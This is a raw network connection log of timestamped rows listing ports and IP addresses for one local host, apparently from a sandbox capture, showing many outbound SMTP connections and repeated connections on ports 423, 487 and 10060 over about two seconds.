Sep 5, 2021 15:50:13.902338028 CEST	49734	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.905011892 CEST	80	49740	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.907433033 CEST	80	49732	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.907520056 CEST	49732	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.907583952 CEST	423	49729	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:13.907795906 CEST	423	49729	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:13.907985926 CEST	49736	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.908061028 CEST	49747	25	192.168.2.4	212.27.48.6
Sep 5, 2021 15:50:13.909624100 CEST	80	49746	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.911783934 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.911813021 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.911885977 CEST	49735	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:13.912039995 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.912132025 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.912163973 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.928288937 CEST	49728	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:13.928674936 CEST	10060	49744	213.91.128.133	192.168.2.4
Sep 5, 2021 15:50:13.928726912 CEST	10060	49744	213.91.128.133	192.168.2.4
Sep 5, 2021 15:50:13.930361986 CEST	80	49734	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.930448055 CEST	49734	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.933099031 CEST	80	49736	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.933252096 CEST	49736	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.939186096 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:13.940474987 CEST	25	49747	212.27.48.6	192.168.2.4
Sep 5, 2021 15:50:13.940598011 CEST	49747	25	192.168.2.4	212.27.48.6
Sep 5, 2021 15:50:13.943877935 CEST	49727	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:13.952821970 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:13.953716993 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:13.954055071 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:13.954785109 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:13.958631039 CEST	49748	25	192.168.2.4	213.120.69.2
Sep 5, 2021 15:50:13.958761930 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:13.959534883 CEST	49729	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:13.961806059 CEST	80	49742	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.961852074 CEST	80	49742	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.961879969 CEST	80	49742	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.961965084 CEST	49742	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.962235928 CEST	49726	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:13.963994980 CEST	25	49745	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:13.964152098 CEST	80	49746	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.964190006 CEST	80	49746	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.964188099 CEST	49745	25	192.168.2.4	67.195.204.80
Sep 5, 2021 15:50:13.964227915 CEST	80	49746	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.964267015 CEST	49746	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.964606047 CEST	80	49740	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.964648962 CEST	80	49740	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.964687109 CEST	80	49740	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:13.964730024 CEST	49740	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:13.965085983 CEST	49724	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:13.965377092 CEST	49725	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:13.972969055 CEST	25	49747	212.27.48.6	192.168.2.4
Sep 5, 2021 15:50:13.973011017 CEST	25	49747	212.27.48.6	192.168.2.4
Sep 5, 2021 15:50:13.973068953 CEST	49747	25	192.168.2.4	212.27.48.6
Sep 5, 2021 15:50:13.973429918 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:13.975150108 CEST	49744	10060	192.168.2.4	213.91.128.133
Sep 5, 2021 15:50:13.986520052 CEST	49737	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:13.988656044 CEST	25	49748	213.120.69.2	192.168.2.4
Sep 5, 2021 15:50:13.988759041 CEST	49748	25	192.168.2.4	213.120.69.2
Sep 5, 2021 15:50:13.989415884 CEST	49747	25	192.168.2.4	212.27.48.6
Sep 5, 2021 15:50:14.001465082 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:14.001512051 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:14.001595974 CEST	49735	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:14.006395102 CEST	49740	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:14.006395102 CEST	49742	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:14.006448030 CEST	49746	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:14.009845018 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:14.010241985 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:14.010279894 CEST	49739	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:14.010826111 CEST	49735	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:14.021832943 CEST	25	49747	212.27.48.6	192.168.2.4
Sep 5, 2021 15:50:14.031203985 CEST	423	49726	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:14.031244040 CEST	423	49726	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:14.033341885 CEST	423	49725	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:14.034466982 CEST	423	49725	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:14.037801981 CEST	25	49735	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:14.039819956 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.040123940 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.041155100 CEST	423	49724	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:14.041420937 CEST	423	49724	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:14.047988892 CEST	25	49748	213.120.69.2	192.168.2.4
Sep 5, 2021 15:50:14.084515095 CEST	49725	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:14.084515095 CEST	49726	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:14.084547043 CEST	49724	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:14.085371971 CEST	49737	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:14.086380959 CEST	487	49739	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:14.100229025 CEST	49748	25	192.168.2.4	213.120.69.2
Sep 5, 2021 15:50:14.115200043 CEST	25	49745	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:14.162009954 CEST	49742	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:14.162689924 CEST	49745	25	192.168.2.4	67.195.204.80
Sep 5, 2021 15:50:14.166111946 CEST	49740	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:14.166819096 CEST	49746	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:14.168504000 CEST	49749	25	192.168.2.4	104.47.13.36
Sep 5, 2021 15:50:14.187736034 CEST	80	49742	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:14.187833071 CEST	49742	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:14.190172911 CEST	49737	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:14.194153070 CEST	80	49740	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:14.194268942 CEST	49740	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:14.194710016 CEST	80	49746	172.217.168.68	192.168.2.4
Sep 5, 2021 15:50:14.195647955 CEST	49746	80	192.168.2.4	172.217.168.68
Sep 5, 2021 15:50:14.210669994 CEST	25	49749	104.47.13.36	192.168.2.4
Sep 5, 2021 15:50:14.211172104 CEST	49749	25	192.168.2.4	104.47.13.36
Sep 5, 2021 15:50:14.244438887 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.244482994 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.244518995 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.244556904 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.244592905 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.295778990 CEST	25	49749	104.47.13.36	192.168.2.4
Sep 5, 2021 15:50:14.309585094 CEST	49749	25	192.168.2.4	104.47.13.36
Sep 5, 2021 15:50:14.310956001 CEST	49748	25	192.168.2.4	213.120.69.2
Sep 5, 2021 15:50:14.311157942 CEST	49745	25	192.168.2.4	67.195.204.80
Sep 5, 2021 15:50:14.311512947 CEST	49750	25	192.168.2.4	213.180.147.146
Sep 5, 2021 15:50:14.341023922 CEST	25	49748	213.120.69.2	192.168.2.4
Sep 5, 2021 15:50:14.341710091 CEST	25	49748	213.120.69.2	192.168.2.4
Sep 5, 2021 15:50:14.349101067 CEST	25	49750	213.180.147.146	192.168.2.4
Sep 5, 2021 15:50:14.349705935 CEST	49750	25	192.168.2.4	213.180.147.146
Sep 5, 2021 15:50:14.352221012 CEST	49748	25	192.168.2.4	213.120.69.2
Sep 5, 2021 15:50:14.352632999 CEST	25	49749	104.47.13.36	192.168.2.4
Sep 5, 2021 15:50:14.360054016 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.360096931 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.360901117 CEST	49737	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:14.361052036 CEST	49749	25	192.168.2.4	104.47.13.36
Sep 5, 2021 15:50:14.369209051 CEST	49737	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:14.382194042 CEST	25	49748	213.120.69.2	192.168.2.4
Sep 5, 2021 15:50:14.386209965 CEST	25	49748	213.120.69.2	192.168.2.4
Sep 5, 2021 15:50:14.386253119 CEST	25	49748	213.120.69.2	192.168.2.4
Sep 5, 2021 15:50:14.386445999 CEST	49748	25	192.168.2.4	213.120.69.2
Sep 5, 2021 15:50:14.388000965 CEST	25	49750	213.180.147.146	192.168.2.4
Sep 5, 2021 15:50:14.399888992 CEST	49748	25	192.168.2.4	213.120.69.2
Sep 5, 2021 15:50:14.404243946 CEST	25	49749	104.47.13.36	192.168.2.4
Sep 5, 2021 15:50:14.419874907 CEST	49749	25	192.168.2.4	104.47.13.36
Sep 5, 2021 15:50:14.422585011 CEST	25	49737	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.423172951 CEST	25	49745	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:14.423293114 CEST	25	49745	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:14.428317070 CEST	49750	25	192.168.2.4	213.180.147.146
Sep 5, 2021 15:50:14.429879904 CEST	25	49748	213.120.69.2	192.168.2.4
Sep 5, 2021 15:50:14.431993961 CEST	49745	25	192.168.2.4	67.195.204.80
Sep 5, 2021 15:50:14.463325977 CEST	25	49749	104.47.13.36	192.168.2.4
Sep 5, 2021 15:50:14.477169991 CEST	49749	25	192.168.2.4	104.47.13.36
Sep 5, 2021 15:50:14.478410006 CEST	49751	25	192.168.2.4	205.220.166.52
Sep 5, 2021 15:50:14.519762039 CEST	25	49749	104.47.13.36	192.168.2.4
Sep 5, 2021 15:50:14.519947052 CEST	25	49749	104.47.13.36	192.168.2.4
Sep 5, 2021 15:50:14.520131111 CEST	49752	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:14.520198107 CEST	49749	25	192.168.2.4	104.47.13.36
Sep 5, 2021 15:50:14.520224094 CEST	49749	25	192.168.2.4	104.47.13.36
Sep 5, 2021 15:50:14.522082090 CEST	49727	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:14.522134066 CEST	49728	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:14.522164106 CEST	49729	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:14.522571087 CEST	49753	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:14.523103952 CEST	49754	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:14.523497105 CEST	49755	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:14.544624090 CEST	25	49745	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:14.544646025 CEST	25	49745	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:14.544780016 CEST	49745	25	192.168.2.4	67.195.204.80
Sep 5, 2021 15:50:14.547580004 CEST	423	49728	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:14.548738003 CEST	423	49754	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:14.548877954 CEST	49728	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:14.548989058 CEST	49754	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:14.552849054 CEST	423	49729	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:14.552953959 CEST	49729	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:14.554984093 CEST	423	49755	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:14.556226969 CEST	49755	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:14.561902046 CEST	49745	25	192.168.2.4	67.195.204.80
Sep 5, 2021 15:50:14.562344074 CEST	25	49749	104.47.13.36	192.168.2.4
Sep 5, 2021 15:50:14.562505960 CEST	423	49727	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:14.562582970 CEST	49756	25	192.168.2.4	104.47.57.161
Sep 5, 2021 15:50:14.563257933 CEST	49727	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:14.564104080 CEST	423	49753	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:14.564192057 CEST	49753	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:14.574789047 CEST	423	49754	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:14.575834036 CEST	49754	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:14.587954044 CEST	423	49755	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:14.588169098 CEST	49755	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:14.601406097 CEST	423	49754	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:14.606045961 CEST	423	49753	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:14.606287003 CEST	49753	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:14.619484901 CEST	423	49755	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:14.647147894 CEST	49724	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:14.647192001 CEST	49725	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:14.647202969 CEST	49726	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:14.648572922 CEST	423	49753	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:14.653326988 CEST	25	49751	205.220.166.52	192.168.2.4
Sep 5, 2021 15:50:14.655935049 CEST	49751	25	192.168.2.4	205.220.166.52
Sep 5, 2021 15:50:14.656816006 CEST	49757	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:14.657279015 CEST	49758	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:14.657687902 CEST	49759	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:14.666138887 CEST	25	49752	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:14.666253090 CEST	49752	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:14.673429966 CEST	25	49745	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:14.692748070 CEST	25	49756	104.47.57.161	192.168.2.4
Sep 5, 2021 15:50:14.692893982 CEST	49756	25	192.168.2.4	104.47.57.161
Sep 5, 2021 15:50:14.717075109 CEST	423	49725	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:14.717210054 CEST	49725	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:14.718133926 CEST	423	49726	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:14.718215942 CEST	49726	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:14.725893974 CEST	423	49724	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:14.725975990 CEST	49724	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:14.732837915 CEST	423	49757	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:14.732939005 CEST	49757	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:14.732975006 CEST	423	49759	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:14.733050108 CEST	49759	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:14.740358114 CEST	423	49758	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:14.740525961 CEST	49758	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:14.785269022 CEST	49760	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:14.806651115 CEST	423	49757	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:14.806694031 CEST	423	49759	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:14.806875944 CEST	49757	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:14.807039022 CEST	49759	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:14.822794914 CEST	423	49758	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:14.823019981 CEST	49758	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:14.826128960 CEST	25	49756	104.47.57.161	192.168.2.4
Sep 5, 2021 15:50:14.838980913 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.839191914 CEST	49760	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:14.839586020 CEST	49756	25	192.168.2.4	104.47.57.161
Sep 5, 2021 15:50:14.879053116 CEST	25	49751	205.220.166.52	192.168.2.4
Sep 5, 2021 15:50:14.880487919 CEST	423	49759	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:14.880892992 CEST	423	49757	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:14.893616915 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.904597044 CEST	423	49758	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:14.907793045 CEST	49760	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:14.909790039 CEST	49751	25	192.168.2.4	205.220.166.52
Sep 5, 2021 15:50:14.940856934 CEST	49761	25	192.168.2.4	208.80.202.60
Sep 5, 2021 15:50:14.961510897 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.963910103 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:14.969877005 CEST	25	49756	104.47.57.161	192.168.2.4
Sep 5, 2021 15:50:14.970280886 CEST	25	49756	104.47.57.161	192.168.2.4
Sep 5, 2021 15:50:14.987968922 CEST	25	49752	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:14.988265038 CEST	25	49752	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:14.988343954 CEST	49752	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:15.006493092 CEST	49760	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:15.022121906 CEST	49756	25	192.168.2.4	104.47.57.161
Sep 5, 2021 15:50:15.054985046 CEST	49760	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:15.055057049 CEST	49756	25	192.168.2.4	104.47.57.161
Sep 5, 2021 15:50:15.057471991 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.069011927 CEST	49753	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:15.069037914 CEST	49754	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:15.069055080 CEST	49755	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:15.069571972 CEST	49763	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:15.069972038 CEST	49764	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:15.070370913 CEST	49765	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:15.070523024 CEST	49752	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:15.080054998 CEST	25	49761	208.80.202.60	192.168.2.4
Sep 5, 2021 15:50:15.080172062 CEST	49761	25	192.168.2.4	208.80.202.60
Sep 5, 2021 15:50:15.084680080 CEST	25	49751	205.220.166.52	192.168.2.4
Sep 5, 2021 15:50:15.084722996 CEST	25	49751	205.220.166.52	192.168.2.4
Sep 5, 2021 15:50:15.084758043 CEST	25	49751	205.220.166.52	192.168.2.4
Sep 5, 2021 15:50:15.084819078 CEST	49751	25	192.168.2.4	205.220.166.52
Sep 5, 2021 15:50:15.084852934 CEST	49751	25	192.168.2.4	205.220.166.52
Sep 5, 2021 15:50:15.094541073 CEST	423	49754	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:15.094655991 CEST	49754	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:15.095007896 CEST	423	49764	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:15.095124006 CEST	49764	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:15.100588083 CEST	423	49755	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:15.100677013 CEST	49755	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:15.101650953 CEST	423	49765	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:15.101757050 CEST	49765	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:15.108864069 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.110583067 CEST	423	49753	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:15.110681057 CEST	49753	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:15.111269951 CEST	423	49763	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:15.111371994 CEST	49763	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:15.120614052 CEST	423	49764	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:15.120836973 CEST	49764	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:15.121607065 CEST	49760	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:15.122464895 CEST	49766	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:15.124953985 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.127424955 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.133801937 CEST	423	49765	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:15.133992910 CEST	49765	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:15.144877911 CEST	25	49766	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:15.145046949 CEST	49766	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:15.146060944 CEST	423	49764	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:15.153384924 CEST	423	49763	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:15.153579950 CEST	49763	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:15.158025026 CEST	49767	25	192.168.2.4	193.222.135.150
Sep 5, 2021 15:50:15.165343046 CEST	423	49765	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:15.167355061 CEST	25	49766	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:15.167426109 CEST	25	49766	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:15.167501926 CEST	49766	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:15.179950953 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.185358047 CEST	25	49756	104.47.57.161	192.168.2.4
Sep 5, 2021 15:50:15.186319113 CEST	25	49756	104.47.57.161	192.168.2.4
Sep 5, 2021 15:50:15.186511993 CEST	25	49756	104.47.57.161	192.168.2.4
Sep 5, 2021 15:50:15.186582088 CEST	49756	25	192.168.2.4	104.47.57.161
Sep 5, 2021 15:50:15.193398952 CEST	49766	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:15.195312023 CEST	423	49763	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:15.196294069 CEST	25	49767	193.222.135.150	192.168.2.4
Sep 5, 2021 15:50:15.196450949 CEST	49767	25	192.168.2.4	193.222.135.150
Sep 5, 2021 15:50:15.201170921 CEST	49756	25	192.168.2.4	104.47.57.161
Sep 5, 2021 15:50:15.215856075 CEST	25	49766	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:15.216695070 CEST	25	49752	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:15.219526052 CEST	25	49761	208.80.202.60	192.168.2.4
Sep 5, 2021 15:50:15.234173059 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.235471964 CEST	25	49767	193.222.135.150	192.168.2.4
Sep 5, 2021 15:50:15.235577106 CEST	25	49767	193.222.135.150	192.168.2.4
Sep 5, 2021 15:50:15.235701084 CEST	49767	25	192.168.2.4	193.222.135.150
Sep 5, 2021 15:50:15.236052990 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.250190020 CEST	49767	25	192.168.2.4	193.222.135.150
Sep 5, 2021 15:50:15.254694939 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.259763002 CEST	49760	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:15.261868954 CEST	25	49750	213.180.147.146	192.168.2.4
Sep 5, 2021 15:50:15.272164106 CEST	49761	25	192.168.2.4	208.80.202.60
Sep 5, 2021 15:50:15.288455963 CEST	25	49767	193.222.135.150	192.168.2.4
Sep 5, 2021 15:50:15.289681911 CEST	49750	25	192.168.2.4	213.180.147.146
Sep 5, 2021 15:50:15.289721012 CEST	49761	25	192.168.2.4	208.80.202.60
Sep 5, 2021 15:50:15.313353062 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.313713074 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.321172953 CEST	49768	25	192.168.2.4	212.227.15.40
Sep 5, 2021 15:50:15.322318077 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.327171087 CEST	25	49750	213.180.147.146	192.168.2.4
Sep 5, 2021 15:50:15.330832958 CEST	25	49750	213.180.147.146	192.168.2.4
Sep 5, 2021 15:50:15.331338882 CEST	25	49756	104.47.57.161	192.168.2.4
Sep 5, 2021 15:50:15.344759941 CEST	25	49768	212.227.15.40	192.168.2.4
Sep 5, 2021 15:50:15.344891071 CEST	49768	25	192.168.2.4	212.227.15.40
Sep 5, 2021 15:50:15.346448898 CEST	49760	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:15.347492933 CEST	49769	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:15.350266933 CEST	49757	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:15.350305080 CEST	49759	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:15.350769997 CEST	49770	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:15.351171017 CEST	49771	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:15.355309010 CEST	49750	25	192.168.2.4	213.180.147.146
Sep 5, 2021 15:50:15.355987072 CEST	49772	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:15.371057987 CEST	25	49768	212.227.15.40	192.168.2.4
Sep 5, 2021 15:50:15.371295929 CEST	25	49768	212.227.15.40	192.168.2.4
Sep 5, 2021 15:50:15.371387005 CEST	49768	25	192.168.2.4	212.227.15.40
Sep 5, 2021 15:50:15.379935026 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.380175114 CEST	25	49772	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:15.380264044 CEST	49772	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:15.383794069 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.383883953 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.386881113 CEST	49768	25	192.168.2.4	212.227.15.40
Sep 5, 2021 15:50:15.400070906 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.400104046 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.400243044 CEST	25	49760	142.250.150.27	192.168.2.4
